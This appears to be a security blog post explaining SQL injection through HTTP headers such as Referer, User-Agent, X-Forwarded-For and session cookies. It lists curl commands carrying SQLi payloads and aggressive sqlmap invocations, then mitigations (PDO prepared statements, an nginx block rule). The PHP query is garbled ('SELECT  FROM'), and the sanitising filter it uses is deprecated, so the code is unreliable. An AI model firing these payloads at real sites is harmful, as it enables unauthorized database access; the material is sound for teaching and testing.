SQL Injection in HTTP Headers: A Hidden Threat in Modern Web Apps

By /

Listen to this Post

Featured Image
This week, a security engineer discovered a working SQL injection vulnerability in the `Referer` header of a web application. Many developers focus only on sanitizing form inputs, but attackers can exploit HTTP headers like:

1. User-Agent

2. Referer

3. X-Forwarded-For

4. session_id

SQL injection (SQLi) isnā€™t deadā€”it has moved to less-monitored areas like headers. If youā€™re building or testing web apps, remember: headers are user input too.

You Should Know:

Testing for SQLi in Headers

Hereā€™s how to manually test for SQL injection in HTTP headers using `cURL` and sqlmap:

1. Manual Testing with cURL

curl -H "User-Agent: ' OR 1=1--" http://example.com/login 
curl -H "Referer: ' UNION SELECT username, password FROM users--" http://example.com/dashboard

2. Automated Testing with sqlmap

sqlmap -u http://example.com --headers="Referer: " --level=5 --risk=3 
sqlmap -u http://example.com --headers="User-Agent: " --dbs

3. Exploiting X-Forwarded-For

curl -H "X-Forwarded-For: 127.0.0.1' AND (SELECT 1 FROM users WHERE username='admin')--" http://example.com/admin

4. Session ID Manipulation

curl -H "Cookie: session_id=' OR SLEEP(5)--" http://example.com/profile

Mitigation Techniques

  • Input Validation: 
    $referer = filter_input(INPUT_SERVER, 'HTTP_REFERER', FILTER_SANITIZE_STRING);
  • Prepared Statements (PHP PDO): 
    $stmt = $pdo->prepare("SELECT  FROM users WHERE ip = ?"); 
$stmt->execute([$_SERVER['HTTP_X_FORWARDED_FOR']]);
  • Web Application Firewall (WAF) Rules: 
    location / { 
if ($http_referer ~ "([';].--|union.select)") { 
return 403; 
} 
}

What Undercode Say:

SQL injection remains a critical threat, especially in overlooked areas like HTTP headers. Developers must implement strict input validation and parameterized queries for all request partsā€”not just forms. Penetration testers should expand their checks to include headers, cookies, and API metadata.

Expected Output:

A vulnerable web app may return:

  • Database errors (MySQL, PostgreSQL, `MSSQL` in responses).
  • Delayed responses (SLEEP(5)).
  • Unauthorized data leaks (UNION SELECT).

Prediction:

As APIs and microservices grow, header-based SQLi will rise. Automated tools will evolve to scan headers, but manual testing will remain crucial for advanced exploitation.

(Relevant article: OWASP SQL Injection Guide)

References:

Reported By: Mohammed Sabir – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass āœ…

Join Our Cyber World:

šŸ’¬ Whatsapp | šŸ’¬ Telegram

Related Posts: